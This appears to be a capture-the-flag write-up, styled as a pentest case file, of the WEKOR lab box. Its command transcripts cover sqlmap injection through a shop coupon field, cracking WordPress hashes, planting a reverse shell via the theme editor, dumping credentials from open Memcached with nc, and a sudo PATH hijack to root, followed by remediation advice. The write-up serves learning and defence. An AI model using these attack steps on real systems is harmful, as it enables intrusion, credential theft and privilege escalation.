Coupon SQLi, WordPress theme RCE, and PATH hijack via bitcoin
Intermediate web engagement: coupon SQLi dumped WordPress hashes; theme editor RCE as www-data; Memcached held Orka credentials; sudo bitcoin resolved python from a writable PATH entry for root.
- Case files
- Coupon SQLi, WordPress theme RCE, and PATH hijack via bitcoin
SQLi on a shop coupon parameter exposed WP users. Theme edit planted a shell. Unauthenticated Memcached disclosed Orka; a relative python call under sudo bitcoin completed root.
sqlmap dumped WP hashes; cracked admin wp_yura edited the theme for a reverse shell.
Unauthenticated Memcached cachedump returned Orka’s password for su.
Planted /usr/sbin/python as a bash wrapper; sudo bitcoin resolved it and dropped a root shell.
Engagement summary
SQLi on a shop coupon parameter exposed WP users. Theme edit planted a shell. Unauthenticated Memcached disclosed Orka; a relative python call under sudo bitcoin completed root.
WEKOR (wekor.thm / site.wekor.thm) exposed a shop under /it-next/ with a coupon field vulnerable to SQL injection. sqlmap dumped wordpress.wp_users; John cracked wp_yura (Administrator). On the site vhost we used the theme editor to drop a PHP reverse shell into 404.php and caught www-data. Local Memcached on 11211 had no authentication — cachedump returned Orka / OrkAiSC00L24/7$. As Orka, sudo -l allowed /home/Orka/Desktop/bitcoin, which invoked python /home/Orka/Desktop/transfer.py via a relative path. secure_path preferred /usr/sbin, which Orka could write; planting a fake python there and re-running bitcoin under sudo yielded root.
Business impact
Coupon SQLi is a database breach. Theme-editor access is RCE. Open Memcached leaks credentials. Sudo binaries that call relative interpreters with a writable secure_path entry are root. Parameterize SQL, lock down theme editing, bind Memcached to localhost with auth, and use absolute interpreter paths under sudo.
Coupon SQLi and WordPress RCE
sqlmap dumped WP hashes; cracked admin wp_yura edited the theme for a reverse shell.
OPERATOR · SQLI
savvy@lab:~$ echo '<IP> wekor.thm site.wekor.thm' | sudo tee -a /etc/hosts
savvy@lab:~$ sqlmap -r it_cart_coupon.xml --dump -D wordpress -T wp_users --threads=10
savvy@lab:~$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
wp_yura cracked — Administrator role
OPERATOR · THEME SHELL
# WP admin → Appearance → Theme Editor → 404.php reverse shell
savvy@lab:~$ nc -nlvp 4444
savvy@lab:~$ curl http://site.wekor.thm/wordpress/wp-content/themes/.../404.php
savvy@lab:/var/www/html$
Memcached credential dump
Unauthenticated Memcached cachedump returned Orka’s password for su.
OPERATOR · MEMCACHED
savvy@lab:~$ echo "stats items" | nc -vn -w 1 127.0.0.1 11211
savvy@lab:~$ echo "stats cachedump 1 0" | nc -vn -w 1 127.0.0.1 11211
savvy@lab:~$ echo "get username" | nc -vn -w 1 127.0.0.1 11211
VALUE username 0 4\r\nOrka
savvy@lab:~$ echo "get password" | nc -vn -w 1 127.0.0.1 11211
OrkAiSC00L24/7$
savvy@lab:~$ su Orka
savvy@lab:~$
Relative python PATH hijack
Planted /usr/sbin/python as a bash wrapper; sudo bitcoin resolved it and dropped a root shell.
OPERATOR · PATH HIJACK
savvy@lab:~$ sudo -l
(root) NOPASSWD: /home/Orka/Desktop/bitcoin
# bitcoin calls relative python; secure_path includes writable /usr/sbin
savvy@lab:~$ printf '#!/bin/bash\n/bin/bash\n' > /usr/sbin/python && chmod +x /usr/sbin/python
savvy@lab:~$ sudo /home/Orka/Desktop/bitcoin
# prompt password: password ; amount: 20
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Fix SQLi; disable theme file editing in production. Authenticate and firewall Memcached. Rewrite sudo helpers to call /usr/bin/python3 with a fixed script path; remove world-writable directories from secure_path.